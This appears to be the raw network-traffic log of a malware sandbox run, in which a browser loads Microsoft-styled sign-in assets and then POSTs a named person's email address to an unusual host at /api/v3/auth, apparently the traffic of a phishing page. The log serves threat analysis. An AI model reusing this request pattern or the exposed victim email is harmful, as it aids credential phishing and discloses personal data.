2024-04-26 16:00:03 UTC	961	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 16:00:03 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"603e8adc-15d9d" Last-Modified: Tue, 02 Mar 2021 18:58:36 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 703574 Expires: Wed, 16 Apr 2025 16:00:03 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gIPp%2FEf9nb5IKwunetaanuoLrfEc1mfz1MhaSUGQeg0YQBDhmU959MW1XLq%2FqI%2F7A7WgJoj0ZdLqoUHcyx9cCQS32mf19aIu0EC9V1C6ryXWVhfz044BlaeQ2RbzhC%2BAOLhPa5WS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 87a7c8929e01a681-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 16:00:03 UTC	408	IN	Data Raw: 37 62 66 30 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f Data Ascii: 7bf0/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 Data Ascii: rototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=type
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 Data Ascii: ,last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return thi
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 Data Ascii: .call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 5d 3f 3d 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c Data Ascii: ]?=)"+M+"(?:'((?:\\\\.\|[^\\\\']))'\|\"((?:\\\\.\|[^\\\\\"]))\"\|("+I+"))\|)"+M+"\\]",F=":("+I+")(?:\$(('((?:\\\\.\|[^\\\\']))'\|\"((?:\\\\.\|[^\\\\\"]))\")\|((?:\\\\.\|[^\\\\()[\\]]\|"+W+"))\|.)\$\|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+\|((?:^\|[^\\
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 Data Ascii: ng(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.le
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 Data Ascii: r r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.remove
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 20 74 2c 6e 2c 72 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 70 3b 72 65 74 75 72 6e 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d Data Ascii: t,n,r=e?e.ownerDocument\|\|e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 Data Ascii: e(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var
2024-04-26 16:00:03 UTC	1369	IN	Data Raw: 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 Data Ascii: eElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"[^$\|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).di

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	152.199.4.44	443	5316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:03 UTC	606	OUT	GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 16:00:03 UTC	719	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 2796185 Cache-Control: public, max-age=31536000 Content-MD5: EuPayFgGHQiAI7K9SOL6lg== Content-Type: image/x-icon Date: Fri, 26 Apr 2024 16:00:03 GMT Etag: 0x8D8731240E548EB Last-Modified: Sun, 18 Oct 2020 03:02:30 GMT Server: ECAcc (mic/9BA0) X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 007b3b7e-b01e-0088-3084-7e5562000000 x-ms-version: 2009-09-19 Content-Length: 17174 Connection: close
2024-04-26 16:00:03 UTC	16383	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-26 16:00:03 UTC	791	IN	Data Raw: 01 80 00 00 01 80 00 28 00 00 00 18 00 00 00 30 00 00 00 01 00 04 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 Data Ascii: (0"P""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	185.216.70.6	443	5316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:06 UTC	473	OUT	OPTIONS /api/v3/auth HTTP/1.1 Host: bc1qusz5l7h87pd2v6sv45nz82s.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type Origin: null User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 16:00:06 UTC	390	IN	HTTP/1.1 200 OK date: Fri, 26 Apr 2024 16:00:06 GMT server: uvicorn vary: Origin access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT access-control-max-age: 600 access-control-allow-credentials: true access-control-allow-origin: null access-control-allow-headers: content-type content-length: 2 content-type: text/plain; charset=utf-8 Connection: close
2024-04-26 16:00:06 UTC	2	IN	Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	185.216.70.6	443	5316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:10 UTC	613	OUT	POST /api/v3/auth HTTP/1.1 Host: bc1qusz5l7h87pd2v6sv45nz82s.com Connection: keep-alive Content-Length: 183 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/json sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 16:00:10 UTC	183	OUT	Data Raw: 7b 22 75 75 69 64 22 3a 22 36 62 35 32 63 65 38 64 2d 32 35 66 62 2d 34 61 33 62 2d 39 61 36 38 2d 65 65 31 65 63 31 34 61 62 37 35 64 22 2c 22 69 64 65 6e 74 69 66 69 65 72 22 3a 22 62 61 66 39 37 64 36 39 2d 66 65 38 62 2d 34 31 63 32 2d 38 37 64 65 2d 39 36 62 33 63 64 63 61 34 38 64 30 22 2c 22 73 65 72 76 65 72 22 3a 22 62 63 31 71 75 73 7a 35 6c 37 68 38 37 70 64 32 76 36 73 76 34 35 6e 7a 38 32 73 2e 63 6f 6d 22 2c 22 75 73 65 72 22 3a 22 61 6d 62 65 72 2e 70 68 69 6c 6c 69 70 73 40 68 6f 75 73 65 63 61 6c 6c 70 72 6f 2e 63 6f 6d 22 7d Data Ascii: {"uuid":"6b52ce8d-25fb-4a3b-9a68-ee1ec14ab75d","identifier":"baf97d69-fe8b-41c2-87de-96b3cdca48d0","server":"bc1qusz5l7h87pd2v6sv45nz82s.com","user":"amber.phillips@housecallpro.com"}
2024-04-26 16:00:10 UTC	216	IN	HTTP/1.1 200 OK date: Fri, 26 Apr 2024 16:00:10 GMT server: uvicorn content-length: 84 content-type: application/json access-control-allow-origin: * access-control-allow-credentials: true Connection: close
2024-04-26 16:00:11 UTC	84	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 62 6c 6f 63 6b 65 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 3c 68 32 3e 20 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 68 61 73 20 62 65 65 6e 20 72 65 73 74 72 69 63 74 65 64 2e 3c 2f 68 32 3e 22 7d Data Ascii: {"status":"blocked","message":"<h2> Access to the server has been restricted.</h2>"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	23.204.76.112	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:10 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 16:00:11 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0758) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=54214 Date: Fri, 26 Apr 2024 16:00:11 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	152.199.4.44	443	5316	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 16:00:10 UTC	406	OUT	GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 16:00:11 UTC	719	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 2796193 Cache-Control: public, max-age=31536000 Content-MD5: EuPayFgGHQiAI7K9SOL6lg== Content-Type: image/x-icon Date: Fri, 26 Apr 2024 16:00:11 GMT Etag: 0x8D8731240E548EB Last-Modified: Sun, 18 Oct 2020 03:02:30 GMT Server: ECAcc (mic/9BA0) X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 007b3b7e-b01e-0088-3084-7e5562000000 x-ms-version: 2009-09-19 Content-Length: 17174 Connection: close
2024-04-26 16:00:11 UTC	16383	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-26 16:00:11 UTC	791	IN	Data Raw: 01 80 00 00 01 80 00 28 00 00 00 18 00 00 00 30 00 00 00 01 00 04 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 Data Ascii: (0"P""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 